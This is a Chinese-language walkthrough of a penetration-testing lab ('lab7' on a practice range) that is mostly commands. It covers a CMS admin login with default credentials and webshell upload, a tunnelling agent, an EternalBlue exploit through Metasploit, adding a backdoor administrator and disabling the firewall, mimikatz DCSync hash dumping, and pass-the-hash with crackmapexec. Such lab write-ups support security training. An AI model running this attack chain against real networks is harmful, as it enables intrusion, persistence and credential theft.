lab7
精简思路
1
|
依旧是10主机先拿设立了,发现2个内网主机40与20,40打永恒之蓝然后再创建用户,发现其是域控机子,直接pth打20主机
|
bagecms-rce
扫c段没扫出啥,直接对10主机扫端口,扫出一个cms
1
|
/index.php?r=admini/public/login
|
进入后台admin/admin123456登入,然后模板编辑写马进去
永恒之蓝
ipconfig发现又内网,上传fscan扫,发现20与40主机,40主机有永恒之蓝
先打40主机
1
|
sudo openvpn --config cyberstrikelab.com-lab7.ovpn --keepalive 10 60 --route-nopull --route 192.168.10.0 255.255.255.0 &
|
1
2
|
./linux_x64_admin -l 172.16.233.2:8000 -s 123
win_agent.exe -c 172.16.233.2:8000 -s 123 --reconnect 8
|
1
2
3
4
5
|
proxychains4 msfconsole
use auxiliary/admin/smb/ms17_010_command
set RHOSTS 192.168.20.40
set COMMAND type C:\\flag.txt
run
|
PTH
添加一个用户远程登入,这里也给10主机加一个吧
1
2
3
4
|
set COMMAND 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
set COMMAND net user xtk 123@abc /add
set COMMAND net localgroup Administrators xtk /add
set COMMAND netsh firewall set opmode disable
|
1
|
proxychains4 xfreerdp /u:xtk /p:'123@abc' /v:192.168.20.10 /cert:ignore /tls-seclevel:0 /drive:share,/mnt/xpw/kali_shard
|
1
2
|
proxychains4 xfreerdp /u:xtk /p:'123@abc' /v:192.168.20.40 /cert:ignore /tls-seclevel:0 /drive:share,/mnt/xpw/kali_shard
#/tls-seclevel:0 参数,降低安全验证等级,允许连接旧系统。
|
登入后打net group "Domain Controllers" /domain发现是域控服务器,那就是打哈希传递
上传猕猴桃,当然也同时可以上线cs,试试!改一下java版本,之前换成java8了
1
|
sudo update-alternatives --config java
|
然后上线
1
|
./teamserver 172.16.233.2 111111
|
转发cs就是上不了?那手打
1
2
|
privilege::debug
lsadump::dcsync /domain:cyberstrikelab.com /all
|
1
|
d8174fc8c5ee7a8e460df2e61d00bd3c
|
1
|
proxychains4 crackmapexec smb 192.168.20.20 -u administrator -H d8174fc8c5ee7a8e460df2e61d00bd3c -d cyberstrikelab.com -x "type C:\\flag.txt"
|
